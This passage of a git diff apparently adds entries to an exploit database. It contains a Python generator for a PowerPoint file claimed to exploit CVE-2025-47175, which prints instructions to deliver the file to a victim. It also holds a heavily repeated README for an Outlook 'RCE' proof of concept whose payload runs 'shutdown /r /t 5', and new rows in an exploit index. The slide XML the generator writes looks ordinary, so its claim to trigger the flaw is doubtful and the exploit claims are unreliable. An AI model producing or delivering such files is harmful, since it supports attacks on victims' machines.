+#   -t, --text     Trigger text inside the slide (default: explanation message)
+#
+# Example:
+# python3 exploit_cve2025_47175.py -o evil.pptx -i 5678 -n "BadShape" -t "Triggering CVE-2025-47175 now!"
+import zipfile
+import sys
+import argparse
+
+def create_exploit_pptx(filename, shape_id, shape_name, trigger_text):
+    slide_xml = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
+       xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="{shape_id}" name="{shape_name}"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:t>{trigger_text}</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+</p:sld>'''
+
+    try:
+        with zipfile.ZipFile(filename, 'w') as z:
+            z.writestr('[Content_Types].xml',
+                '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
+  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
+  <Default Extension="xml" ContentType="application/xml"/>
+  <Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
+</Types>''')
+
+            z.writestr('ppt/_rels/presentation.xml.rels',
+                '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/>
+</Relationships>''')
+
+            z.writestr('ppt/presentation.xml',
+                '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:presentation xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
+                xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:sldIdLst>
+    <p:sldId id="256" r:id="rId1"/>
+  </p:sldIdLst>
+  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
+</p:presentation>''')
+
+            z.writestr('ppt/slides/slide1.xml', slide_xml)
+
+        print(f"[+] Malicious PPTX file '{filename}' created successfully.")
+        print("[*] Deliver this file to the victim and wait for them to open it in vulnerable PowerPoint.")
+    except Exception as e:
+        print(f"[-] Error: {e}", file=sys.stderr)
+        sys.exit(1)
+
+def main():
+    parser = argparse.ArgumentParser(description='Exploit generator for CVE-2025-47175 (PowerPoint UAF)')
+    parser.add_argument('-o', '--output', type=str, default='exploit_cve_2025_47175.pptx',
+                        help='Output PPTX filename (default: exploit_cve_2025_47175.pptx)')
+    parser.add_argument('-i', '--id', type=int, default=1234,
+                        help='Shape ID (default: 1234)')
+    parser.add_argument('-n', '--name', type=str, default='MaliciousShape',
+                        help='Shape Name (default: MaliciousShape)')
+    parser.add_argument('-t', '--text', type=str, default='This content triggers CVE-2025-47175 UAF vulnerability.',
+                        help='Trigger text inside the slide (default: explanation message)')
+    args = parser.parse_args()
+
+    create_exploit_pptx(args.output, args.id, args.name, args.text)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/windows/remote/52356.txt b/exploits/windows/remote/52356.txt
new file mode 100644
index 000000000..0fc92f9b6
--- /dev/null
+++ b/exploits/windows/remote/52356.txt
@@ -0,0 +1,341 @@
+# Titles: Microsoft Outlook - Remote Code Execution (RCE)
+# Author: nu11secur1ty
+# Date: 07/06/2025
+# Vendor: Microsoft
+# Software: https://www.microsoft.com/en-us/microsoft-365/outlook/log-in
+# Reference:
+https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47176 >
+https://www.cloudflare.com/learning/security/what-is-remote-code-execution/
+# CVE-2025-47176
+
+## Description
+This proof-of-concept (PoC) demonstrates the CVE-2025-47176 vulnerability
+simulation. It injects a crafted mail item into Outlook containing a
+malicious sync path that triggers an action during scanning.
+
+**IMPORTANT:**
+This PoC simulates the vulnerable Outlook path parsing and triggers a
+**system restart** when the malicious path is detected.
+
+---
+## Additional Testing with malicious.prf
+
+You can also test this PoC by importing a crafted Outlook Profile File
+(`malicious.prf`):
+
+1. Place `malicious.prf` in the same folder as `PoC.py`.
+2. Run Outlook with the import command:
+
+   ```powershell
+   & "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
+/importprf malicious.prf
+
+
+## Usage
+
+1. Ensure you have Outlook installed and configured on your Windows machine.
+2. Run the PoC script with Python 3.x (requires `pywin32` package):
+   ```powershell
+   pip install pywin32
+   python PoC.py
+   ```
+3. The script will:
+   - Inject a mail item with the malicious sync path.
+   - Wait 10 seconds for Outlook to process the mail.
+   - Scan Inbox and Drafts folders.
+   - Upon detection, normalize the path and trigger a system restart
+(`shutdown /r /t 5`).
+
+---
+
+## Warning
+
+- This script **will restart your computer** after 5 seconds once the
+payload is triggered.
+- Save all work before running.
+- Test only in a controlled or virtualized environment.
+- Do **NOT** run on production or important systems.
+
+---
+
+## Files
+
+- `PoC.py` - The Python proof-of-concept script.
+- `README.md` - This file.
+
+---
+
+## License
+
+This PoC is provided for educational and research purposes only.
+
+Use responsibly and ethically.
+
+
+# Video:
+[href](https://www.youtube.com/watch?v=nac3kUe_d1c)
+
+# Source:
+[href](
+https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47176)
+
+# Buy me a coffee if you are not ashamed:
+[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
+
+# Time spent:
+03:35:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>
+
+
+На нд, 6.07.2025 г. в 10:34 nu11 secur1ty <nu11secur1typentest@gmail.com>
+написа:
+
+> # Titles: Microsoft Outlook Remote Code Execution Vulnerability - ACE
+> # Author: nu11secur1ty
+> # Date: 07/06/2025
+> # Vendor: Microsoft
+> # Software: https://www.microsoft.com/en-us/microsoft-365/outlook/log-in
+> # Reference:
+> https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47176 >
+> https://www.cloudflare.com/learning/security/what-is-remote-code-execution/
+> # CVE-2025-47176
+>
+> ## Description
+> This proof-of-concept (PoC) demonstrates the CVE-2025-47176 vulnerability
+> simulation. It injects a crafted mail item into Outlook containing a
+> malicious sync path that triggers an action during scanning.
+>
+> **IMPORTANT:**
+> This PoC simulates the vulnerable Outlook path parsing and triggers a
+> **system restart** when the malicious path is detected.
+>
+> ---
+> ## Additional Testing with malicious.prf
+>
+> You can also test this PoC by importing a crafted Outlook Profile File
+> (`malicious.prf`):
+>
+> 1. Place `malicious.prf` in the same folder as `PoC.py`.
+> 2. Run Outlook with the import command:
+>
+>    ```powershell
+>    & "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
+> /importprf malicious.prf
+>
+>
+> ## Usage
+>
+> 1. Ensure you have Outlook installed and configured on your Windows
+> machine.
+> 2. Run the PoC script with Python 3.x (requires `pywin32` package):
+>    ```powershell
+>    pip install pywin32
+>    python PoC.py
+>    ```
+> 3. The script will:
+>    - Inject a mail item with the malicious sync path.
+>    - Wait 10 seconds for Outlook to process the mail.
+>    - Scan Inbox and Drafts folders.
+>    - Upon detection, normalize the path and trigger a system restart
+> (`shutdown /r /t 5`).
+>
+> ---
+>
+> ## Warning
+>
+> - This script **will restart your computer** after 5 seconds once the
+> payload is triggered.
+> - Save all work before running.
+> - Test only in a controlled or virtualized environment.
+> - Do **NOT** run on production or important systems.
+>
+> ---
+>
+> ## Files
+>
+> - `PoC.py` - The Python proof-of-concept script.
+> - `README.md` - This file.
+>
+> ---
+>
+> ## License
+>
+> This PoC is provided for educational and research purposes only.
+>
+> Use responsibly and ethically.
+>
+>
+> # Reproduce:
+> [href](https://www.youtube.com/watch?v=yOra0pm8CHg)
+>
+> # Source:
+> [href](
+> https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47176)
+>
+> # Buy me a coffee if you are not ashamed:
+> [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
+>
+> # Time spent:
+> 03:35:00
+>
+>
+> --
+> System Administrator - Infrastructure Engineer
+> Penetration Testing Engineer
+> Exploit developer at https://packetstormsecurity.com/
+> https://cve.mitre.org/index.html
+> https://cxsecurity.com/ and https://www.exploit-db.com/
+> 0day Exploit DataBase https://0day.today/
+> home page: https://www.nu11secur1ty.com/
+> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+>                           nu11secur1ty <http://nu11secur1ty.com/>
+>
+> На нд, 6.07.2025 г. в 9:53 nu11 secur1ty <nu11secur1typentest@gmail.com>
+> написа:
+>
+>> # Titles: Microsoft Outlook Remote Code Execution Vulnerability - ACE
+>> # Author: nu11secur1ty
+>> # Date: 07/06/2025
+>> # Vendor: Microsoft
+>> # Software: https://www.microsoft.com/en-us/microsoft-365/outlook/log-in
+>> # Reference:
+>> https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47176 >
+>> https://www.cloudflare.com/learning/security/what-is-remote-code-execution/
+>> # CVE-2025-47176
+>>
+>> ## Description
+>> This proof-of-concept (PoC) demonstrates the CVE-2025-47176 vulnerability
+>> simulation. It injects a crafted mail item into Outlook containing a
+>> malicious sync path that triggers an action during scanning.
+>>
+>> **IMPORTANT:**
+>> This PoC simulates the vulnerable Outlook path parsing and triggers a
+>> **system restart** when the malicious path is detected.
+>>
+>> ---
+>> ## Additional Testing with malicious.prf
+>>
+>> You can also test this PoC by importing a crafted Outlook Profile File
+>> (`malicious.prf`):
+>>
+>> 1. Place `malicious.prf` in the same folder as `PoC.py`.
+>> 2. Run Outlook with the import command:
+>>
+>>    ```powershell
+>>    & "C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
+>> /importprf malicious.prf
+>>
+>>
+>> ## Usage
+>>
+>> 1. Ensure you have Outlook installed and configured on your Windows
+>> machine.
+>> 2. Run the PoC script with Python 3.x (requires `pywin32` package):
+>>    ```powershell
+>>    pip install pywin32
+>>    python PoC.py
+>>    ```
+>> 3. The script will:
+>>    - Inject a mail item with the malicious sync path.
+>>    - Wait 10 seconds for Outlook to process the mail.
+>>    - Scan Inbox and Drafts folders.
+>>    - Upon detection, normalize the path and trigger a system restart
+>> (`shutdown /r /t 5`).
+>>
+>> ---
+>>
+>> ## Warning
+>>
+>> - This script **will restart your computer** after 5 seconds once the
+>> payload is triggered.
+>> - Save all work before running.
+>> - Test only in a controlled or virtualized environment.
+>> - Do **NOT** run on production or important systems.
+>>
+>> ---
+>>
+>> ## Files
+>>
+>> - `PoC.py` - The Python proof-of-concept script.
+>> - `README.md` - This file.
+>>
+>> ---
+>>
+>> ## License
+>>
+>> This PoC is provided for educational and research purposes only.
+>>
+>> Use responsibly and ethically.
+>>
+>>
+>> # Reproduce:
+>> [href](https://www.youtube.com/watch?v=yOra0pm8CHg)
+>>
+>> # Buy me a coffee if you are not ashamed:
+>> [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
+>>
+>> # Time spent:
+>> 03:35:00
+>>
+>>
+>> --
+>> System Administrator - Infrastructure Engineer
+>> Penetration Testing Engineer
+>> Exploit developer at https://packetstormsecurity.com/
+>> https://cve.mitre.org/index.html
+>> https://cxsecurity.com/ and https://www.exploit-db.com/
+>> 0day Exploit DataBase https://0day.today/
+>> home page: https://www.nu11secur1ty.com/
+>> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+>>                           nu11secur1ty <http://nu11secur1ty.com/>
+>>
+>> --
+>>
+>> System Administrator - Infrastructure Engineer
+>> Penetration Testing Engineer
+>> Exploit developer at https://packetstorm.news/
+>> https://cve.mitre.org/index.html
+>> https://cxsecurity.com/ and https://www.exploit-db.com/
+>> 0day Exploit DataBase https://0day.today/
+>> home page: https://www.nu11secur1ty.com/
+>> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+>>                           nu11secur1ty <http://nu11secur1ty.com/>
+>>
+>
+>
+> --
+>
+> System Administrator - Infrastructure Engineer
+> Penetration Testing Engineer
+> Exploit developer at https://packetstorm.news/
+> https://cve.mitre.org/index.html
+> https://cxsecurity.com/ and https://www.exploit-db.com/
+> 0day Exploit DataBase https://0day.today/
+> home page: https://www.nu11secur1ty.com/
+> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+>                           nu11secur1ty <http://nu11secur1ty.com/>
+>
+
+
+--
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstorm.news/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 1cc6a1f9c..1a7a6906d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -7803,6 +7803,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42183,exploits/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation",2017-06-14,"Qualys Corporation",local,linux,,2017-06-15,2017-06-20,0,CVE-2017-1000367,,Linux_sudo_CVE-2017-1000367.c,,,http://seclists.org/oss-sec/2017/q2/470
 48052,exploits/linux/local/48052.sh,"Sudo 1.8.25p - 'pwfeedback' Buffer Overflow",2020-02-06,"Dylan Katz",local,linux,,2020-02-11,2020-08-20,0,CVE-2019-18634,,,,,https://github.com/Plazmaz/CVE-2019-18634/blob/b348e738a83fd4180b3ec26ed216535547f3bb8a/self-contained.sh
 47502,exploits/linux/local/47502.py,"sudo 1.8.27 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux,,2019-10-15,2021-12-17,0,CVE-2019-14287,,,,,
+52354,exploits/linux/local/52354.txt,"Sudo 1.9.17 Host Option - Elevation of Privilege",2025-07-08,"Rich Mirch",local,linux,,2025-07-08,2025-07-08,0,CVE-2025-32462,,,,,
+52352,exploits/linux/local/52352.txt,"Sudo chroot 1.9.17 - Local Privilege Escalation",2025-07-08,Stratascale,local,linux,,2025-07-08,2025-07-08,0,CVE-2025-32463,,,,,
 26498,exploits/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",local,linux,,2005-11-11,2013-07-01,1,CVE-2005-4158;OSVDB-20764,,,,,https://www.securityfocus.com/bid/15394/info
 319,exploits/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,local,linux,,1996-02-12,,1,OSVDB-61460,,,,,
 470,exploits/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission",2004-09-21,"Angelo Rosiello",local,linux,,2004-09-20,2016-03-30,1,OSVDB-10023;CVE-2004-1689,,,,http://www.exploit-db.comsudo-1.6.8.tar.gz,
@@ -10492,6 +10494,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,,2018-02-08,2018-02-08,0,,,,,,http://www.lynxsecurity.io/releases/Local%20File%20Disclosure%20in%20Marked2.pdf
 19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",local,multiple,,2000-03-03,2012-07-13,1,CVE-2000-0172;OSVDB-5268,,,,,https://www.securityfocus.com/bid/1038/info
 49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",2021-01-28,"Justin Steven",local,multiple,,2021-01-28,2021-01-28,0,CVE-2020-7384,,,,,
+52355,exploits/multiple/local/52355.txt,"Microsoft Defender for Endpoint (MDE) - Elevation of Privilege",2025-07-08,"Rich Mirch",local,multiple,,2025-07-08,2025-07-08,0,CVE-2025-47161,,,,,
 51359,exploits/multiple/local/51359.txt,"Microsoft Edge (Chromium-based) Webview2 1.0.1661.34 - Spoofing",2023-04-10,nu11secur1ty,local,multiple,,2023-04-10,2023-04-10,0,CVE-2023-24892,,,,,
 51571,exploits/multiple/local/51571.txt,"Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure",2023-07-06,nu11secur1ty,local,multiple,,2023-07-06,2023-07-19,0,CVE-2023-33145,,,,,
 48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,,2020-03-18,2020-03-18,0,,,,,,https://github.com/doyensec/VSCode_PoC_Oct2019/tree/19f09e5cf4bfcad500f9238748fb34d07284fa4f
@@ -11522,6 +11525,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15298,exploits/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",remote,multiple,,2010-10-21,2015-04-21,0,OSVDB-68821;OSVDB-68820;OSVDB-68819;OSVDB-68818,,,,,
 24246,exploits/multiple/remote/24246.txt,"SCI Photo Chat 3.4.9 - Cross-Site Scripting",2004-07-20,"Donato Ferrante",remote,multiple,,2004-07-20,2013-01-20,1,CVE-2004-0673;OSVDB-7473,,,,,https://www.securityfocus.com/bid/10648/info
 46193,exploits/multiple/remote/46193.py,"SCP Client - Multiple Vulnerabilities (SSHtranger Things)",2019-01-18,"Mark E. Haase",remote,multiple,,2019-01-18,2019-01-18,0,CVE-2019-6111;CVE-2019-6110,,"SSHtranger Things",,,https://gist.github.com/mehaase/63e45c17bdbbd59e8e68d02ec58f4ca2
+52353,exploits/multiple/remote/52353.py,"ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)",2025-07-08,"Alexandre ZANNI",remote,multiple,,2025-07-08,2025-07-08,0,CVE-2025-47228,,,,,
 4761,exploits/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,remote,multiple,25,2007-12-20,2016-12-04,1,CVE-2007-4560,,,,,
 34439,exploits/multiple/remote/34439.txt,"ServletExec - Directory Traversal / Authentication Bypass",2010-08-12,"Stefano Di Paola",remote,multiple,,2010-08-12,2014-08-28,1,,,,,,https://www.securityfocus.com/bid/42411/info
 23756,exploits/multiple/remote/23756.txt,"Seyeon Technology FlexWATCH Server 2.2 - Cross-Site Scripting",2004-02-24,"Rafel Ivgi The-Insider",remote,multiple,,2004-02-24,2012-12-30,1,,,,,,https://www.securityfocus.com/bid/9739/info
@@ -11922,6 +11926,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31686,exploits/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,webapps,multiple,80,2014-02-16,2014-02-16,1,OSVDB-103387,,,,,
 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,,2018-07-11,2018-07-13,1,,Traversal,,http://www.exploit-db.com/screenshots/idlt45500/45007.png,,
 33759,exploits/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,webapps,multiple,,2010-03-14,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38721/info
+52358,exploits/multiple/webapps/52358.py,"Discourse 3.2.x - Anonymous Cache Poisoning",2025-07-08,İbrahimsql,webapps,multiple,,2025-07-08,2025-07-08,0,CVE-2024-47773,,,,,
 49752,exploits/multiple/webapps/49752.html,"DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)",2021-04-08,"Issac Briones",webapps,multiple,,2021-04-08,2021-04-08,0,CVE-2021-30147,,,,,
 48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,,2020-07-22,2020-07-22,0,CVE-2020-7680,,,,,
 33764,exploits/multiple/webapps/33764.txt,"Dojo Toolkit 1.4.1 - '/dijit/tests/_testCommon.js?theme' Cross-Site Scripting",2010-03-15,"Adam Bixby",webapps,multiple,,2010-03-15,2017-11-24,1,CVE-2010-2275;OSVDB-63073,,,,,https://www.securityfocus.com/bid/38739/info
@@ -12430,6 +12435,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51218,exploits/multiple/webapps/51218.txt,"SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS)",2023-04-03,geeklinuxman,webapps,multiple,,2023-04-03,2023-04-03,0,CVE-2022-47870,,,,,
 17174,exploits/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - (Authenticated) Local File Inclusion / Edit",2011-04-15,bitform,webapps,multiple,,2011-04-15,2011-04-15,1,,,,,http://www.exploit-db.comsql-ledger-2.8.33.tar.gz,
 24320,exploits/multiple/webapps/24320.py,"SQLiteManager 1.2.4 - Remote PHP Code Injection",2013-01-24,RealGame,webapps,multiple,,2013-01-24,2018-03-15,1,OSVDB-89701,,,,http://www.exploit-db.comSQliteManager-1.2.4.tar.gz,
+52357,exploits/multiple/webapps/52357.txt,"Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover",2025-07-08,stealthcopter,webapps,multiple,,2025-07-08,2025-07-08,0,CVE-2024-50477,,,,,
 50237,exploits/multiple/webapps/50237.py,"Strapi 3.0.0-beta - Set Password (Unauthenticated)",2021-08-30,"David Anglada",webapps,multiple,,2021-08-30,2021-08-30,0,CVE-2019-18818,,,,,
 50238,exploits/multiple/webapps/50238.py,"Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)",2021-08-30,"David Utón",webapps,multiple,,2021-08-30,2021-08-30,0,CVE-2019-19609,,,,,
 50239,exploits/multiple/webapps/50239.py,"Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-30,"Musyoka Ian",webapps,multiple,,2021-08-30,2021-08-30,0,,,,,,
@@ -44532,6 +44538,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32339,exploits/windows/remote/32339.txt,"Microsoft Organization Chart 2 - Remote Code Execution",2008-09-08,"Ivan Sanchez",remote,windows,,2008-09-08,2014-03-19,1,CVE-2008-3956;OSVDB-48000,,,,,https://www.securityfocus.com/bid/31059/info
 16700,exploits/windows/remote/16700.rb,"Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-10,1,CVE-2010-0266;OSVDB-66296;MS10-045,"Metasploit Framework (MSF)",,,,http://www.akitasecurity.nl/advisory.php?id=AK20091001
 16699,exploits/windows/remote/16699.rb,"Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-10,1,CVE-2010-0266;OSVDB-66296;MS10-045,"Metasploit Framework (MSF)",,,,http://www.akitasecurity.nl/advisory.php?id=AK20091001
+52356,exploits/windows/remote/52356.txt,"Microsoft Outlook - Remote Code Execution (RCE)",2025-07-08,nu11secur1ty,remote,windows,,2025-07-08,2025-07-08,0,,,,,,
 20571,exploits/windows/remote/20571.txt,"Microsoft Outlook 2000 0/98 0/Express 5.5 - Concealed Attachment",2001-01-17,http-equiv,remote,windows,,2001-01-17,2012-08-27,1,OSVDB-85833,,,,,https://www.securityfocus.com/bid/2260/info
 23796,exploits/windows/remote/23796.html,"Microsoft Outlook 2002 - 'Mailto' Quoting Zone Bypass",2004-03-09,shaun2k2,remote,windows,,2004-03-09,2013-01-01,1,CVE-2004-0121;OSVDB-4168,,,,,https://www.securityfocus.com/bid/9827/info
 24114,exploits/windows/remote/24114.html,"Microsoft Outlook 2003 - Mail Client E-mail Address Verification",2004-05-11,http-equiv,remote,windows,,2004-05-11,2013-01-15,1,CVE-2004-0501;OSVDB-6079,,,,,https://www.securityfocus.com/bid/10323/info
@@ -44565,6 +44572,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28226,exploits/windows/remote/28226.c,"Microsoft PowerPoint 2003 - '.ppt' File Closure Memory Corruption",2006-07-14,"naveed afzal",remote,windows,,2006-07-14,2013-09-12,1,CVE-2006-3656;OSVDB-27327,,,,,https://www.securityfocus.com/bid/18993/info
 28224,exploits/windows/remote/28224.c,"Microsoft PowerPoint 2003 - 'mso.dll' '.PPT' Processing Code Execution",2006-07-14,"naveed afzal",remote,windows,,2006-07-14,2013-09-12,1,CVE-2006-3655;OSVDB-27325,,,,,https://www.securityfocus.com/bid/18993/info
 28225,exploits/windows/remote/28225.c,"Microsoft PowerPoint 2003 - 'powerpnt.exe' Remote Overflow",2006-07-14,"naveed afzal",remote,windows,,2006-07-14,2017-11-22,1,CVE-2006-3660;OSVDB-27326,,,,,https://www.securityfocus.com/bid/18993/info
+52351,exploits/windows/remote/52351.py,"Microsoft PowerPoint 2019 - Remote Code Execution (RCE)",2025-07-08,"Mohammed Idrees Banyamer",remote,windows,,2025-07-08,2025-07-08,0,CVE-2025-47175,,,,,
 16334,exploits/windows/remote/16334.rb,"Microsoft Private Communications Transport - Remote Overflow (MS04-011) (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-07,1,CVE-2003-0719;OSVDB-5250;MS04-011,"Metasploit Framework (MSF)",,,,
 4874,exploits/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method",2008-01-09,shinnai,remote,windows,,2008-01-08,2016-11-14,1,CVE-2008-0237,,,,,
 16749,exploits/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)",2011-01-11,Metasploit,remote,windows,,2011-01-11,2011-03-06,1,CVE-2003-0352;OSVDB-2100;MS03-026,"Metasploit Framework (MSF)",,,,